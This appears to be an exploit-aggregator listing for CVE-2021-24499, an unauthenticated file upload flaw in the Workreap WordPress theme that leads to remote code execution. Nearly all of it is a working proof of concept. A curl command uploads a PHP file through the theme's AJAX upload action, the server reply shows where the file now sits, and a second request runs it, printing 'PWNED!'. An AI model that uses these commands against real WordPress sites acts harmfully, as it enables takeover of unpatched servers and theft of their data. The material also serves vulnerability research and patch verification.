Exploit for Workreap < 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution CVE-2021-24499

Name: Exploit for Workreap < 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution CVE-2021-24499
Rating: 5 (100 reviews)

2021-07-02 | CVSS 7.5

## https://sploitus.com/exploit?id=WPEX-ID:74611D5F-AFBA-42AE-BC19-777CDF2808CB
% curl -F 'action=workreap_award_temp_file_uploader' -F award_img=@malicious.php 'http://example.com/wp-admin/admin-ajax.php'
{"type":"success","message":"File uploaded!","thumbnail":"http:\/\/example.com\/wp-content\/uploads\/workreap-temp\/malicious.php","name":"malicious.php","size":"24.00 B"}

% curl 'http://example.com/wp-content/uploads/workreap-temp/malicious.php'
PWNED!